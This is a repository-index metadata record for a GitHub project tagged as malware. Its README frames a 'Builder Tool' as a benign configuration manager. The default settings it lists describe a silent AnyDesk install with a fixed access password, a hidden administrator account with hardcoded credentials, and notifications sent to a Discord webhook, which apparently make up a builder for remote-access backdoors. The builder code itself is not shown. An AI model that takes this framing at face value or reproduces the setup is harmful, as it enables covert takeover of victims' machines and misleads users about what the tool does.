{"id":17973173,"url":"https://github.com/lalaio1/anyfck-base-builder","last_synced_at":"2026-05-09T04:32:45.183Z","repository":{"id":259782446,"uuid":"879418341","full_name":"lalaio1/AnyFck-Base-Builder","owner":"lalaio1","description":"A \"simple\" builder base for other projects","archived":false,"fork":false,"pushed_at":"2024-10-27T21:41:54.000Z","size":55,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-03T23:13:56.295Z","etag":null,"topics":["api","builder","maware","php","project-base","python"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lalaio1.png","metadata":{"files":{"readme":"README.md","changelog":"history/history.json","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-10-27T21:03:31.000Z","updated_at":"2024-10-27T21:47:00.000Z","dependencies_parsed_at":"2024-10-28T01:25:14.301Z","dependency_job_id":null,"html_url":"https://github.com/lalaio1/AnyFck-Base-Builder","commit_stats":null,"previous_names":["lalaio1/anyfck-base-builder"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lalaio1%2FAnyFck-Base-Builder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lalaio1%2FAnyFck-Base-Builder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lalaio1%2FAnyFck-Base-Builder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lalaio1%2FAnyFck-Base-Builder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lalaio1","download_url":"https://codeload.github.com/lalaio1/AnyFck-Base-Builder/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247092393,"owners_count":20882218,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["api","builder","maware","php","project-base","python"],"created_at":"2024-10-29T16:27:49.391Z","updated_at":"2026-05-09T04:32:45.135Z","avatar_url":"https://github.com/lalaio1.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🎉 Welcome to the Builder Tool! 🎉\n\n![1](./1.jpg)\nThe Builder Tool is designed to simplify your configuration management process, making it easy to create and maintain your setup.\n\n## 🚀 Features\n\n- Easy configuration file creation\n- History tracking of configurations\n- User-friendly input prompts\n- YAML and JSON support\n- Logging for better debugging\n\n---\n\n## 📦 Table of Contents\n\n- [Installation](#installation)\n- [Usage](#usage)\n- [Configuration Defaults](#configuration-defaults)\n- [History Management](#history-management)\n- [Contributing](#contributing)\n- [License](#license)\n- [Contact](#contact)\n\n---\n\n## 🛠️ Installation\n\n1. Clone the repository:\n   ```bash\n   git clone https://github.com/lalaio1/AnyFuck-Base-Builder\n   cd AnyFuck-Base-Builder\n   ```\n\n2. Install the required dependencies:\n   ```bash\n   pip install -r requirements.txt\n   ```\n\n---\n\n## 📜 Usage\n\nTo start the Builder Tool, run the following command:\n\n```bash\npython Builder.py\n```\n\n### Example Configuration\n\nHere’s an example of how the configuration looks:\n\n| Key               | Default Value                   | Description                                      |\n|-------------------|---------------------------------|--------------------------------------------------|\n| `anydeskURL`      | `http://download.anydesk.com/...` | URL for downloading the AnyDesk executable       |\n| `installPath`     | `C:\\ProgramData\\AnyDesk`       | Directory for AnyDesk installation                |\n| `password`        | `917bhasudbg7`                 | Main access password                             |\n| `adminUsername`   | `oldadministrator`              | Administrator username                           |\n| `adminPassword`   | `lalaio1`                      | Administrator password                           |\n| `webhookURL`      | `YOUR_DISCORD_WEBHOOK_URL`     | Discord webhook URL for notifications            |\n\n---\n\n## 🔄 Configuration Defaults\n\nConfiguration defaults are stored in a YAML file, which can be easily modified:\n\n```yaml\nanydeskURL:\n  value: \"http://download.anydesk.com/AnyDesk.exe\"\n  desc: \"[i] URL para download do executável do AnyDesk\"\ninstallPath:\n  value: \"C:\\\\ProgramData\\\\AnyDesk\"\n  desc: \"[i] Diretório onde o AnyDesk será instalado\"\npassword:\n  value: \"917bhasudbg7\"\n  desc: \"[i] Senha principal de acesso\"\nadminUsername:\n  value: \"oldadministrator\"\n  desc: \"[i] Nome do usuário administrador\"\nadminPassword:\n  value: \"lalaio1\"\n  desc: \"[i] Senha do usuário administrador\"\nwebhookURL:\n  value: \"YOUR_DISCORD_WEBHOOK_URL\"\n  desc: \"[i] URL do webhook do Discord para notificações\"\n```\n\n---\n\n## 📚 History Management\n\nThe Builder Tool keeps track of previous configurations, allowing you to revert or review changes easily.\n\n### Load History\n\nYou can load history from a JSON file, which will give you insight into your past configurations.\n\n## 🖥️ API Integration\n\nThe Builder Tool includes a simple API located at `./api`, allowing for seamless integration and interaction with your configurations.\n\nFor detailed documentation, please refer to the [API Documentation](https://github.com/lalaio1/AnyFck-Base-Builder/tree/main/api).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flalaio1%2Fanyfck-base-builder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flalaio1%2Fanyfck-base-builder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flalaio1%2Fanyfck-base-builder/lists"}